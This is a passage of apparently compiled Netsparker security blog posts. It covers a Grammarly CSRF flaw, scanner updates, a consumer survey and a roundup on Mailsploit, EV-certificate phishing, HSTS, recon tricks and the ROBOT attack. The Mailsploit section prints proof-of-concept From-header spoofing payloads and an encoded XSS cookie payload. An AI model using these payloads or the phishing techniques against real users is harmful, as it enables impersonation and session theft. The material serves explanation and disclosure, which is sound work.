4. The victim is now logged in to the attacker's account, and the attacker can use their own email and password to log into Grammarly and view sensitive data belonging to their victim

Potential Implications of the CSRF Attack on Grammarly

    These scenarios are not theoretical in nature. This type of web application vulnerability was found in Grammarly a few months ago. As soon as Netsparker noticed the security flaw, we acted responsibly and reported it to the company. Grammarly reacted quickly and professionally, fixing the bug in a short amount of time.

    Companies such as Grammarly, however, don't always have the luxury of knowing about web application vulnerabilities before an attack happens. In this type of CSRF attack, the user's documents are saved in the attacker's account and everything they do subsequently is actually done in the hacker's Grammarly account.

    It is easy to think of scenarios where heavily sensitive data in the hands of hackers could be put to malicious use. Consider this: if you had used Grammarly, what types of documents would you have checked? If you ran a company that is planning a merger and some of your legal documentation got into the hands of hackers, might they be able to use that to publish and expose company secrets or future strategy? What irrevocable damage might that do to your plans? Might the company buying you back out of the deal?

    If you are in charge of a public body that stores lots of clients' personal and health data and you were checking the content of a series of test result letters, what damage might such a breach do to public trust and credibility? Would it incur government fines or other heavy penalties, perhaps?

    If your company provides services to another company, you may have employed Grammarly to check your contract renewal terms before sending. What damage might be done if those contracts, along with your pricing structure and other terms, were revealed to your competitors?

    Is Grammarly secure?

    Think how many of your employees and partners use online tools. Which ones are secure?

And, if you own and run similar online services, what are you doing, first of all, to ensure that your system has a robust security posture? And what will you continue to do to maintain it?

You can read about a similar flaw that was found in the Yandex browser ('CSRF Vulnerability in Yandex Browser Allows Attackers to Steal Victims' Browsing Data').

    The Need for Cross-Site Request Forgery Protection

    The problem for Grammarly was that there was no CSRF protection in place. Specifically, Grammarly's online service had no CSRF protection for its login and logout functionality. Some may argue that this is not a significant issue. It can become significant, however, when combined with other vulnerabilities, particularly when these other vulnerabilities may not be otherwise reachable. There certainly was a detrimental effect in this case, where it had a direct impact on the confidentiality of users' data.
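
For readers unfamiliar with the countermeasure, a minimal, generic illustration of CSRF protection (not Grammarly's actual implementation) is a per-session anti-CSRF token: the server embeds a random token in every sensitive form and rejects any request that does not echo it back, which a third-party page cannot do because it cannot read the token.

<!-- Generic illustration only; field names and token value are assumptions -->
<form method="POST" action="/v3/login">
  <input type="hidden" name="csrf_token" value="3f7a9c1e5b2d48c6a0e4f19d7b6c2a58">
  <input type="text" name="email">
  <input type="password" name="password">
  <button type="submit">Log in</button>
</form>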

    Netsparker can reliably detect Cross-Site Request Forgery vulnerabilities in login forms among others. If you are unsure whether your website is properly protected against this type of attack, download the free demo of Netsparker Desktop to see how many vulnerabilities it can identify on your websites.

    September 2017 Update of Netsparker Cloud


    We are very happy to announce the September 2017 update of Netsparker Cloud. In this update, we included new features, a good number of improvements, new security checks and numerous bug fixes. Here is an overview of what is new and improved in this September 2017 update of Netsparker Cloud.

    New Features

    Configurable List of Parameter Names for Improved Handling of Anti-CSRF Tokens

We love automation! Netsparker can scan a website that uses Anti-CSRF tokens without you having to disable them. Now you can also add a list of parameter names that carry Anti-CSRF tokens, so the scanner can scan them successfully without being hindered by the tokens.

    Configurable List of Parameter Names for Improved Handling of Anti-CSRF Tokens

    Attacking Optimization Options for Recurring Parameters on Different Pages

When this option is enabled, Netsparker identifies parameters that are used on multiple pages, so that it does not scan them multiple times. Examples of such parameters include search widgets, newsletter subscription forms and similar elements. This setting can be enabled from the Attacking section of a Scan Policy.

    Attacking Optimization Options for Recurring Parameters on Different Pages

    Support for Multiple Configured Credentials

It is now possible in Netsparker Cloud to configure multiple Basic, NTLM and Digest authentication credentials for the same target. So if your website has multiple password-protected areas, and each of them requires different credentials or uses a different authentication mechanism, you can configure them all in Netsparker Cloud and scan every password-protected area in a single scan. For more information on how to configure multiple sets of credentials, refer to the section Configuring multiple sets of credentials and URLs in the document Configuring Basic, NTLM & Digest Authentication in Netsparker.

    Other Notable Features

    In this September 2017 update of Netsparker Cloud we have also added the following:

    • Ability to configure custom HTTP headers for a scan
    • Added the new Site Profile node in the Knowledge Base

    New Security Checks & Product Improvements

In this update, we included numerous new security checks, as well as product and security check improvements. Since the list is too long (yes, we really worked hard over the summer), we cannot include it in this blog post. Please refer to the Netsparker Cloud changelog for a detailed list of what is new, improved and fixed in this update of Netsparker Cloud.

    November 2017 Netsparker Desktop Update


    Today, we are delighted to announce a new update of Netsparker Desktop web application security scanner. In this update, we have improved some of the security checks and made several performance enhancements. But, most importantly, we have added new features that will help you automate more. This announcement highlights what is new and improved in this latest update.

    Configuring Web Storage Data (Local/Session) for a Website

    In the Scan Policy, you can now configure both Local and Session Web Storage Data for a target website. This is useful when you need to provide a token and its value prior to the scan.

    As illustrated in the screenshot, to configure Web Storage data, navigate to the Web Storage menu and specify the Type, Key, Value and Origin.

    Configuring Web Storage Data (Local/Session) for a Website
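
For context, local and session storage entries are simple key/value pairs that the application itself would normally set in the browser via JavaScript. A minimal illustration follows; the key names and token value are assumptions, so use whatever your application actually expects:

// Values an application might set after a successful login; configuring the same
// entries in the Scan Policy lets the scanner crawl pages that depend on them.
localStorage.setItem('access_token', 'eyJhbGciOiJIUzI1NiJ9.example.payload');
sessionStorage.setItem('session_id', 'a1b2c3d4');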

    New Parse From URL Feature for Form Values

    In Netsparker web application security scanner, you can pre-configure the values the scanner uses when traversing web forms. In this update, we added a new feature called Parse From URL, which you can use to automatically extract a list of parameters and their types from a web form, instead of having to dig through the HTML code. It's pretty neat, isn’t it?

    New Parse From URL Feature for Form Values

    Support for HTTP Header Authentication

    When scanning a website that requires authentication, you can easily configure the Form Authentication if it uses web forms, or specify the credentials in the Scan Wizard if it uses Basic, Digest, NTLM or similar authentication mechanisms.

    With this update, if for some reason, you need to manually add HTTP authentication headers prior to a scan, you can easily do so from the Headers section in the Scan Wizard, as illustrated in the screenshot.

    Support for HTTP Header Authentication

    To add a new HTTP Authorization header, click Add Authorization Header, select the type of authentication you are using and specify the Value.
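
For example, a Basic authentication header carries the Base64-encoded user:password pair; the credentials below are purely illustrative:

Authorization: Basic dXNlcjpwYXNzd29yZA==

(Here, dXNlcjpwYXNzd29yZA== is simply the Base64 encoding of "user:password".)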

    Other Updates and Improvements in the Netsparker Desktop November Update

    In this update we also:

    • Changed one of the vulnerability severity names from 'Important' to 'High'
    • Updated several external references in vulnerability reports
    • Improved the default form values' settings
    • Improved scan stability and performance
    • Improved the DOM simulation for a number of specific events
    • And much more!

    For a comprehensive list of new features, improvements and fixes in the November update of Netsparker Desktop web application security scanner, please refer to the changelog.

    Explanation & Demo of the Content Security Policy (CSP)


Scanning a web application for vulnerabilities and ensuring it is secure is certainly a good thing to do. However, there are other things you can leverage to improve the security posture of your web applications, such as Content Security Policy (CSP).

Watch our security researcher Sven Morgenroth deliver a presentation and demo about CSP during episode #536 of Paul’s Security Weekly. During the podcast, Sven:

• Explains what CSP is,
    • Explains some CSP directives and how to use them,
    • Shows some of the most common mistakes one can make when configuring CSP,
    • Explains how CSP helps in preventing Cross-site Scripting vulnerabilities on your web applications.

During the podcast, Sven also gives a demo showing the effect Content Security Policy directives have when used to protect a web application, and highlights some best practices. He also shows how you can use the Netsparker web application security scanner to ensure your Content Security Policy is airtight, or better, hacker tight!
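
For reference, a Content Security Policy is delivered as an HTTP response header. A minimal illustrative policy might look like the following; the directive values are examples only, not the ones used in the demo:

Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'; frame-ancestors 'none'

Here, scripts may only be loaded from the site itself and an assumed trusted CDN, plugins are blocked entirely, and the page may not be framed by other sites.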

    Slides for Content Security Policy Presentation & Demo

    Below are the slides Sven used during the presentation and demo of the Content Security Policy.

    Consumers Survey Results: Web Applications Most at Risk of Getting Hacked & Consumers’ Online Risky Behavior


    Earlier this year, we conducted a survey to discover consumers’ major concerns when shopping online. The answers were not surprising. A whopping 77.6% of respondents worry about websites being hacked.

    But are these same consumers also concerned about their own devices getting hacked? And do they do enough to protect them? In the same survey we asked consumers about how they use their personal devices. Here are the results.

    Are Consumers at Risk of Cyber Attacks?

The answer, unfortunately, is a resounding yes. Eighty percent of our respondents admitted to doing things online that put them at risk. The most common were:

    • Using open, unsecured wifi networks
    • Clicking on social media links that are not familiar
    • Using the same password for all logins
    • Using weak passwords

    Are Consumers at Risk of Cyber Attacks?

    Are Consumers Protecting Themselves?

    Even though many consumers take risks, 85% of respondents said that they also take actions to protect their privacy and their data. For example:

    • 46% said they deleted their history and cookies when using a public computer
    • 38% of the respondents turn off location services on their phones
    • 19.4% tape over their laptop camera (but they should visit our booth at events we attend, where we give out web cam covers for free!)

    Are Consumers Protecting Themselves?

    Are Any of The Respondents Paranoid?

    Considering 80% of the respondents take risks online, this one is quite a surprise! Twenty-three percent of respondents said that when they book a property via Airbnb, they go through every room to check for cameras and electronic devices!

    Do People Use the Same Password for All Online Logins?

85.5% of the respondents claim that they request a new password each time they need to log in to a website. That’s a bit impractical, but also unnecessary since the advent of password management software. However, it's just as silly to use the same password for all online logins. Here are some interesting statistics on that point. It's more than a little worrying to see that 84.8% of respondents use the same password, or a limited number of passwords, for their online logins.


    What Services and Data Are Respondents Most Concerned About?

    One of the most eye-watering statistics we uncovered was the 15% who said that they were not at all concerned whether hackers accessed any of their data or services! We have to conclude that these consumers simply do not understand the implications of having their data hacked. As for the rest, most were concerned about their email accounts, not surprising as it is one of the services regular consumers use most – for signing up to online services of all kinds, opening bank accounts, contacting lawyers, applying for jobs or even arranging mortgages, for example. The statistics in this category were as follows:

    • 57% Email accounts
    • 40.4% Files
    • 30.2% Browser history

    Here is the graph with all the possible responses and figures.


    How Often Are Smart Home Devices, Computers and Mobile Gadgets Updated?

    There are many security best practices consumers can follow to ensure their online security. One of the most crucial, and easiest, is to keep the devices and software you use up to date. So, do people keep their phones, computers and tablets up to date?

    • 20.25% never update their smart home devices
    • 7.4% never update their computer's operating system
    • 7.2% never update their mobile phone or tablet

    These numbers are pleasingly low, indicating that more and more people are aware of the need for regular updates. However, check out the other side of the coin:

    • 24.5% don’t know that smart home devices need to be updated
    • 6.1% don’t know that their computer's operating system needs to be updated
    • 5.5% don’t know that mobiles and tablets need to be updated

    Clearly, work is needed to raise awareness on smart home devices (also known as 'the Internet of Things' or 'IoT'). Now comes the really worrying part.

    Who Should Be Held Responsible for Hack Attacks That Happen Because the Software Was Not Up to Date?

    While 52% of respondents believe that the device owner should be held responsible for the hack attack (and we agree!), many others have other ideas:

    • 33% believe the device provider should be held responsible
    • 21% believe a third-party security company should be held responsible
    • 14.2% believe that the government should be held responsible

    It seems that many neither inform themselves well enough about what they are going to purchase, nor read the fine print. It could also be the case that vendors are not doing enough to explain things to consumers, who, it could be argued, cannot be expected to keep up to date with the myriad and finer points of web vulnerabilities.


    Which Technologies Are Most at Risk of Future Hacks?

    We left the most important question for last. If you are involved in the IT security industry, it is easier to keep yourself current with what security risks exist, which ones enable hacks and how to protect yourself. You probably also have a very good understanding of which technologies, devices and software are targeted most, and why.

    But what about consumers? What about those who do not work in the IT security industry? Which technologies do they think are most at risk of future hacks? The answers are not surprising because they are basically a reflection of what people hear in mainstream media.


    Web Applications Are Most at Risk of Being Hacked

    Could this answer be the result of everyone hearing about web application hacks, as reported in mainstream news? Or do consumers think that web applications are most at risk because they are more exposed to them (online services)? It's difficult to tell, though there is certainly room for improvement on both the part of companies who build web applications and consumers who use them.

    So How Can We Reduce the Risks of Being Hacked?

    Hackers are clever; consumers need to be clever too. As consumers, couldn't we all become more active in helping to secure our own data? We've all bought products without researching them and signed up to services without examining the terms. We use the same or similar passwords for multiple logins and don't change them regularly. We enable features that we don't understand. And we fail to update our devices. This article sets out some really simple steps consumers can take to chip away at the ease with which hackers exploit one of the biggest web vulnerabilities of all – indifference.

    Web application development companies in turn can do three things to reduce the risks to both them and the data of those who buy and use their products:

    1. Cultivate a development environment where building more secure web applications becomes a central part of the SDLC
    2. Educate and update uninformed consumers on the significant risks they are subject to, and some very basic steps they can take to reduce them
    3. Take advantage of the web application security solutions available on the market and scan their web applications for vulnerabilities, before malicious attackers do!

    December 2017 Update for Netsparker Cloud


    We're almost at the close of 2017. But, before it ends, we wanted to present you with a seasonal gift – a huge update to Netsparker Cloud, our web application security scanning solution. This blog post highlights what is new, improved and fixed in the December 2017 update of Netsparker Cloud.

    Real Time Scan Results

    One of the most common problems in online services is that users have to wait until a scan is complete to see the results. Not in Netsparker Cloud!

    Like Netsparker Desktop, Netsparker Cloud now displays scan statistics in real time. As soon as Netsparker Cloud identifies a vulnerability, it reports it and displays all the details while the scan is still running. This empowers you to take action immediately.


    Integration Support with FogBugz, GitHub and TFS Issue Tracking Systems

    A few months ago we announced the integration with JIRA, an issue tracking system, which enabled you to configure the automated posting of vulnerabilities as issues in JIRA projects.

    In this latest update, we added integration support for FogBugz, GitHub and Team Foundation Server (TFS). You can now use the Integration wizard to integrate Netsparker Cloud with your issue tracking system in mere minutes.


    Option to Group Email and SMS Notifications

    Notifications are really important. They keep you posted when scans start and finish, and alert you to critical issues. Yet, when you receive lots of notifications, instinctively, you might start to ignore them.

    To avoid this, we've introduced a new option that allows you to group notifications within a time period. All you have to do is enable the Group option for every notification, and specify the period during which notifications should be grouped.


    For example, if you set this period as 30 minutes, all notifications generated within 30 minutes of each other will be grouped and sent as one. If, for example, three scans finish within thirty minutes of each other, you will receive a single email (not three) with a summary about each scan. Genius!

    Other Noteworthy Updates

    In this update, we also included the following:

    • New Scan Policy setting to define Web Storage (Session and Local)
    • New options to schedule incremental scans
    • Support for importing links from a CSV file
    • Support for parsing gzipped sitemaps
    • Many other improvements and bug fixes

    For a complete list of what is new, improved and fixed in this end-of-year update of Netsparker Cloud, please refer to the Changelog.


    Netsparker's Weekly Security Roundup 2017 - Week 51


    Finally – OWASP Top 10 2017!

    Although the OWASP Top 10 vulnerability list is not a mandatory web security standards document, it plays a significant role in the cyber-security sector, not least because it is compiled based on data collected by the web security community, and has set the agenda since its first publication in 2004.

    A full four years after the last list (2013), OWASP has finally published its up-to-date Top 10 vulnerability list. It overcame much initial opposition; some controversial items were removed and others were revised during the preparation process.

    A preliminary, contentious draft was first published in April 2017. OWASP proposed the inclusion of A7: Insufficient Attack Protection, which many felt included a not terribly well-disguised reference to Contrast Security, the company that recommended the item for the list and that develops a Web Application Firewall (WAF) product. Naturally, this was met with opposition. After some changes, the item was folded into another entry and ended up in 10th place as Insufficient Logging and Monitoring. There was also an entry for API Security in the first draft. However, it didn't make it into the final version.

    The final 2017 list has a lot of similarities when compared to the Top 10 - 2013. However, some vulnerabilities that OWASP removed in the current version – such as Open Redirection and CSRF, the latter of which was called 'the sleeping giant' in OWASP documents – are known to have a huge impact on the security of web applications.

    These are, by far, not the only changes to the new list:

    • Insecure Direct Object References (IDOR), which is amongst the vulnerabilities with the highest impact regarding mobile security, was merged with Missing Function Level Access Control and became the new A5: Broken Access Control
    • Insufficient Logging & Monitoring, XML External Entity (XXE) and Insecure Deserialization were added in OWASP Top 10 2017 RC2 as brand new vulnerabilities.

    Cross-site scripting (XSS) vulnerabilities have been downgraded from 3rd to 7th place in the 2017 list. This could have been influenced by new client-side security measures, such as Content Security Policy and XSS filters, that are built into most modern browsers.

    This is a screenshot of the table contained in the Release Notes section of the 2017 publication, revealing what was removed, added or merged in comparison with the previous version (2013).


    For a more detailed explanation of all the security flaws in the list, see OWASP Top 10 2017.

    Mailsploit

    From the 1990s to the 2000s, it was relatively easy for scammers to fake a sender's email address. One of the main vulnerabilities was facilitated by a series of bugs in email clients that enabled hackers to change the From: header. The technique was dubbed Mailsploit by Sabri Haddouche, the researcher who found it.

    However, since the advent of Domain-based Message Authentication, Reporting & Conformance (DMARC), that type of hack has become much more difficult to accomplish. DMARC is enabled by publishing a few specific values in Domain Name System (DNS) records, building on Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM).
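    As a rough illustration, these mechanisms are published as DNS TXT records along the following lines (the domain, selector and key values are placeholders):

        example.com.                       IN TXT "v=spf1 include:_spf.example.com -all"
        selector._domainkey.example.com.   IN TXT "v=DKIM1; k=rsa; p=<base64-encoded public key>"
        _dmarc.example.com.                IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"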

    RFC 1342 Representation of Non-ASCII Text in Internet Message Headers

    These new security measures are implemented by most, if not all, popular email services. But those precautions are ineffective if email services and clients display the wrong sender name to the user.

    Shockingly, this is exactly what happened to thirty email services in 2017. The culprit was a detail in RFC 1342 Representation of Non-ASCII Text in Internet Message Headers, an Internet Activities Board (IAB) Official Protocol Standards document (memo) that describes how the developers of email clients should handle non-ASCII text in the From: header.

    This is how the vulnerability works. ASCII values are expected in all fields in an email message. The From: field is one of them. RFC 1342 contains an interesting detail – the Mailsploit vulnerability occurs due to the following explanation:

    • A mail composer that implements this specification will provide a means of inputting non-ASCII text in header fields, but will translate these fields (or appropriate portions of these fields) into encoded-words before inserting them into the message header.
    • A mail reader that implements this specification will recognize encoded-words when they appear in certain portions of the message header. Instead of displaying the encoded-word "as-is", it will reverse the encoding and display the original text in the designated character set.

    According to RFC 1342, mail clients that want to adhere to the specification must be able to decode properly encoded non-ASCII characters within the header fields. It can be done like this:

                   =?utf-8?b?[BASE-64]?=

                   =?utf-8?Q?[QUOTED-PRINTABLE]?=

    Most email clients and email services overlooked a dangerous pitfall at this point – decoded values may contain dangerous characters such as null bytes and new lines. Adding these characters cuts off the domain part of the sender's email address, making it possible to effectively change the sender address that the user sees to an arbitrary one.
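    The core of the problem can be sketched in a few lines of Python, using only the standard library. The addresses follow the published proof of concept, and the single combined encoded-word is a simplification of the real payload shown below:

        import base64
        from email.header import decode_header

        # Build an encoded-word that hides a fake sender followed by a null byte
        fake_sender = "potus@whitehouse.gov\x00"
        encoded_word = "=?utf-8?b?" + base64.b64encode(fake_sender.encode()).decode() + "?="
        from_header = encoded_word + "@mailsploit.com"

        # A naive mail reader decodes the encoded-word as-is...
        decoded_bytes, charset = decode_header(encoded_word)[0]
        decoded = decoded_bytes.decode(charset)

        # ...and if it then truncates at the null byte, only the fake sender is displayed,
        # while the real @mailsploit.com domain disappears from view
        print(repr(decoded))             # 'potus@whitehouse.gov\x00'
        print(decoded.split("\x00")[0])  # potus@whitehouse.gov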

    The Mailsploit research found that, in Apple's Mail app:

    • The client on iOS is vulnerable to a null-byte injection
    • The client on macOS is vulnerable to an email(name) injection

    A  payload that combines both vectors works perfectly across all operating systems. Let's examine a From header field:

    From: =?utf-8?b?${base64_encode('potus@whitehouse.gov')}?==?utf-8?Q?=00?==?utf-8?b?${base64_encode('(potus@whitehouse.gov)')}?=@mailsploit.com

    This is the payload after the encoding process:

    From: =?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?==?utf-8?Q?=00?==?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?=@mailsploit.com

    The above header field, once decoded by Mail.app, becomes this one:

    From: potus@whitehouse.gov\0(potus@whitehouse.gov)@mailsploit.com

    The email's sender would be displayed as potus@whitehouse.gov on both macOS and iOS. This is what is really going on:

    • iOS will discard everything after the null-byte (the part after the \0 character)
    • macOS ignores the null-byte, but will stop after the first valid email it sees (due to a bug in the parser)

    Why Did Email Service Precautions Not Work?

    While the email client mistakenly shows potus@whitehouse.gov, DKIM and SPF verifications come from the @mailsploit.com domain. Since this is the host where the mail is coming from, all checks are passed. This is because the bug is in the code that displays the sender's address, but not in the code that checks the DMARC-related records.

    Was it Simply Sender Address Spoofing?

    Unfortunately not! It wasn't simply that null bytes and new line characters could be added. Even encoded XSS payloads could have been injected into the From: section. After the decoding process, the unsanitized XSS payload would remain.

    A series of services were affected by this kind of XSS attack in the From: header. For example, both the HushMail and Open Mailbox email services were happily running malicious HTML code, as demonstrated in the researcher's video.

    A mail header containing an encoded XSS payload may look similar to this one:

    From: =?utf-8?b?c2VydmljZUBwYXlwYWwuY29tPGlmcmFtZSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSBzcmM9aHR0cHM6Ly93d3cuaHVzaG1haWwuY29tIHN0eWxlPSJkaXNwbGF5Om5vbmUi?==?utf-8?Q?=0A=00?=@mailsploit.com

    The mail client will decode the From: header above to this payload:

    From: service@paypal.com<iframe onload=alert(document.cookie) src=https://www.hushmail.com style="display:none"\n\0@mailsploit.com

    For further information on the vulnerability, see Mailsploit.

    Extended Validation Certificate (EV) – A New Way of Phishing

    Statistics show that the use of Secure Sockets Layer and Transport Layer Security (SSL/TLS) protocols is increasing by the day. However, SSL, at least, is a double-edged sword. It has many security advantages, but scammers who run phishing websites often use certificates to hoodwink their victims.

    There are three types of certificates for websites: Domain Validation (DV), Organization Validation (OV) and Extended Validation (EV). OV and DV certificates resemble each other. Depending on the browser, they usually display a green padlock to the left of the address bar. EV certificates display the green padlock too, but also the name of the corporation as well as country information. (Look at your browser's address bar right now to see an example.)

    Unfortunately there are some inconsistencies when it comes to displaying EV certificate information across browsers. For further technical details, see Scott Helme’s recent blog post, Are EV certificates worth the paper they're written on?.

    Security Research With EV Certificates

    Even though getting EV certificates is tough, since you need to have a registered company, two Security Researchers have published their experience of how they were able to get EV certificates without problems, and how they could have used them for phishing attacks.

    Exploiting Browsers' EV Certificate Ownership Information Positioning

    The first experiment was conducted by James Burton. He applied for a Symantec EV certificate for a company he registered, which he called 'Identity Verified'. It turns out that registering a company and obtaining such a certificate only costs about £40. He also used a free, one-month plan from Symantec.


    Why he chose this company name is pretty obvious. In the Safari browser on a site with an EV certificate, the company name overlaps the address bar in its entirety (see above). In this example, all the user sees in the address bar is the phrase 'Identity Verified'.

    This is what it would look like on a cellphone.


    So, when an unsuspecting user sees this above a Google login page, the user naturally assumes that it's Google's identity that is verified. A phishing attempt using this technique will most likely be highly effective!

    The situation is different in Firefox and Chrome. In Firefox, the website's registered company name is displayed to the left of the address bar.


    Chrome is similar. While you can also see the address bar, you could still use a phishing domain, incorporating a logo that matches the one used in the Identity Verified popup. This is much more difficult for a hacker to achieve though, because they would most likely get detected while acquiring an EV certificate. Read all the details about this EV certificate experiment.


    Gaming EV Ownership With Stripe

    Ian Carroll was another Security Researcher who conducted a similar experiment, using a slightly different approach from James Burton's: the company name and country information are displayed in the address bar. The company he registered for the experiment was called 'Stripe, Inc'. If that sounds familiar, it is probably because there is a popular payment processing company with the same name!

    So, when you visit the website he registered, https://stripe.ian.sh/, you will see 'Stripe Inc US' to the left of the address bar.


    The website’s EV certificate was issued by Comodo. But, when you see 'Stripe, Inc [US]', you probably think of the real Stripe Inc (the payment processor from Delaware). However, this website belongs to Ian’s company in Kentucky; only the state is different. The confusion arises because company names in the US are registered at state level, so two unrelated companies in different states can legitimately share the same name.

    We’ve mentioned Safari's behavior above. In this example, the other browsers fare no better! Chrome and Firefox will also display 'Stripe, Inc [US]' as the EV's ownership. You can read more about the vulnerability on Ian's website.

    It is very difficult for the average user to spot  this type of phishing site.

    .dev Support From Google!

    Google has been a central driving force behind the widespread adoption of Transport Layer Security (TLS). Google has used HTTPS for Gmail since 2010, and it also reserves the better spots on its search results pages for websites that use SSL. Naturally, this strong stance helped to increase the popularity of SSL elsewhere. In addition, Google was a gold sponsor of Let’s Encrypt (even Netsparker sponsors Let’s Encrypt), which provides SSL certificates free of charge.

    At the beginning of 2017, Google began warning users about websites with insecure HTTP connections, by displaying the 'Not Secure' notification. It was a giant leap forward that helped to push HTTPS and insecure connections into the spotlight, particularly for average users.

    Then, Google crowned its efforts with a brand new move: it announced that it would include the .dev Top Level Domain (TLD) in its HSTS preload list. As a result, .dev domains need to be served over HTTPS. The move also covers .foo domains.

    If HTTPS is not enforced, a malicious attacker executing a man-in-the-middle (MITM) attack could serve an otherwise encrypted website over unencrypted HTTP. For this reason, it's important to serve your website exclusively over a secure connection if the transmission of sensitive data is involved. It might also be the case that the attacker presents an invalid SSL certificate for the attacked website, and users might just click through the warning prompt to get to the content they wanted to see. HSTS forces connections over HTTPS and prevents users from clicking through certificate warnings.

    This sounds like a good thing. The problem is that HSTS is usually activated through an HTTP response header. So does that mean that an attacker could just remove the header from a plain HTTP response? Unfortunately that's a very real threat! HSTS is based on the Trust on First Use (TOFU) methodology. This header has to be set upon the first connection. However, there is an easy way to enable HSTS for a site, even if it was never even visited by the browser. In Google Chrome this is done by adding a site to the so-called HSTS preload list. This is a hardcoded list in the source code of the Chrome browser. If a user wants to visit a site, Chrome will check whether or not the site is mentioned in this list. If it finds the site, it will enable HSTS, even if it was never previously visited by the browser.

    Adding your website to the list requires a few steps. It also takes some time until the changes take effect, as the new list will only be distributed once a new Chrome update is released. Since .dev and .foo domains are mostly used in a development environment, and are not public, it's not possible to add them to the list. In fact, the .dev top level domain is a valid TLD. However, Google is the owner of this extension and uses it for internal purposes only.

    With its latest change, Google now forces developers to either enable HTTPS in their development environment or use one of the TLDs below. They are specifically recommended for development environments:

    • .test
    • .example
    • .invalid
    • .localhost
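    For example, a local project can simply be mapped to one of these reserved TLDs through the operating system's hosts file (the host name here is illustrative):

        127.0.0.1    myapp.test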

    If you are interested in this topic, you can read Google's blog post, Broadening HSTS to secure more of the Web.

    Recon is Everywhere!

    Recon is an abbreviation of the word 'reconnaissance'. In our context, it refers to exploration in order to gather lots of information as efficiently as possible. According to some experts in the field, it is the most important step of every penetration test.

    One of our select friends in web security, with the coolest job title ever, Attack Developer, Evren Yalçın, wrote Recon is Everywhere from his unique viewpoint. It includes some really helpful hints for penetration testing aficionados.

    Company Logos

    Have you ever wondered whether you have missed some web pages during the reconnaissance phase of your penetration testing? More often than not, pages exist that even their owners have forgotten. Long-forgotten campaign pages, shareholder or product websites are just a few examples. You can find inactive company web pages using Google’s Reverse Image Search functionality. Simply upload your company logo and you could discover some forgotten websites.

    Copyright

    Another interesting trick is to conduct a search for the copyright text that is often found at the bottom of a company web page. For example, if you want to find pages belonging to example.com, you could type "© 2017 example.com" into Google.

    Humans.TXT

    The humans.txt file aims to provide website visitors with information on who participated in creating the application. Not only is it a great way to know who coded the website, but it's a lamentably straightforward way for attackers to find related GitHub pages, and gain more information about a company and its staff.
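    A typical humans.txt file, served from the web root, looks roughly like this (the names and handles are placeholders):

        /* TEAM */
        Developer: Jane Doe
        Contact: jane.doe [at] example.com
        GitHub: janedoe

        /* SITE */
        Last update: 2017/12/01
        Standards: HTML5, CSS3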

    Reverse Analytics

    Using Google to track what visitors are doing on your website, or gather statistics on how many people you can reach with your content, involves adding a piece of JavaScript code with a unique identifier to your site. This enables Google to distinguish between websites, and present you with the correct data for your page.

    This is an example of the code snippet used.


    The problem is that if you use the same tracking code across different websites, an attacker can easily find all different websites that use it. This also means that the attacker can find all the pages that you set up and therefore find outdated websites that you forgot about. There are two tools that simplify this process: http://www.gachecker.com/ and http://moonsearch.com/analytics/.

    ROBOT Attack Revives a 19-Year Old Vulnerability


    Daniel Bleichenbacher was the security researcher who first discovered, in 1998, that PKCS #1 v1.5 padding error messages sent by a Transport Layer Security (TLS) stack running on a server could enable an adaptive-chosen ciphertext attack. When used in conjunction with RSA encryption, this attack completely shattered TLS confidentiality.

    What Is the ROBOT Attack?

    ROBOT stands for Return Of Bleichenbacher's Oracle Threat – the return of the original vulnerability that enabled hackers to perform RSA decryption and signing operations with a TLS server's private key (without needing the key itself).

    Even though it has been known since the late 1990s, lots of web hosts remain vulnerable to attacks against RSA in TLS.


    How Does the ROBOT Attack Work?

    An attacker can simply send Client Key Exchange (CKE) messages – with wrong paddings – while a TLS-RSA handshake is being negotiated. Then, depending on the server's response to these modified CKE messages, the attacker can determine whether the server provides an oracle that renders the server vulnerable. If they discover a vulnerable server, the attacker will be able to decrypt any ciphertext, or sign any data, with the server's private key. To do so, the attacker first needs to passively record a certain amount of encrypted traffic. The amount of the traffic that needs to be recorded is determined by the strength of the provided oracle.

    Attack Performance and Oracle Types

    Bleichenbacher's article explains that the strength of the provided oracle determines the impact of the attack:

    • With every new, valid oracle response, the attack algorithm finds a new interval (if the decrypted ciphertext begins with '0x0002')
    • The oracle is considered weaker if it sends a negative response for some decrypted ciphertexts that begin with '0x0002', resulting in no new intervals

    In the second situation, the attack would need to create additional queries.

    When using the strongest oracle, 10,000 queries on average will be enough; however, when using the weakest oracle, about 18,000,000 queries will be needed to decrypt a ciphertext. All the other oracles lie between these two in exploitability terms.

    For simplicity, the ROBOT attack paper assumes there are two types of oracle:

    • The strong oracle, which needs less than a million queries
    • The weak oracle, which needs at least several million queries

    Anatomy of a ROBOT Attack Query

    As stated earlier, an attacker needs to send modified CKE messages – with incorrect paddings – while a TLS-RSA handshake is being negotiated, in order to get an oracle from a vulnerable server.

    Based on the previous research on the Bleichenbacher attack, attackers need to create five different types of padding in order to trigger different vulnerabilities in the server. The padding types are outlined below.

    Correctly Formatted TLS Message

    This message contains a correctly formatted PKCS #1 v1.5 padding, with '0x00' in the correct position and the correct TLS version located in the pre-master secret.

    0x0002 [2] | PAD | 0x00 [1] | TLS Version [2] | Random [46]
    (TLS Version and Random together form the 48-byte Pre-master Secret)

    This message should simulate an attacker who correctly guessed the padding as well as the TLS version. It's difficult to trigger (because of a low probability of constructing such a message), but it is needed to evaluate the server correctness.

    Incorrect Padding

    This message starts with incorrect padding bytes.

    0x4117 [2] | PAD

    The invalid first bytes in the padding should trigger unexpected server behavior.

    0x00 Byte in the Wrong Position

    This message is in the correct format, but has '0x00' in the wrong position, so that the unpadded pre-master secret would have an invalid length.

    0x0002 [2] | PAD | 0x0011

    Many implementations assume that the unpadded value has a correct length. If the unpadded value is shorter or longer, it could trigger a buffer overflow or specific internal exceptions, and lead to unexpected server behavior.

    Missing 0x00 Byte

    This message starts with '0x0002' but excludes the '0x00' byte.

    0x0002 [2] | PAD

    If the '0x00' byte is missing, the PKCS #1 v1.5 implementation cannot unpad the encrypted value, which can again result in unexpected server behavior.

    Wrong TLS version

    This message contains an invalid TLS version in the pre-master secret.

    0x0002 [2] | PAD | 0x00 [1] | 0x0202 [2] | Random [46]
    (Pre-master Secret [48])

    This message should also trigger unexpected behavior.
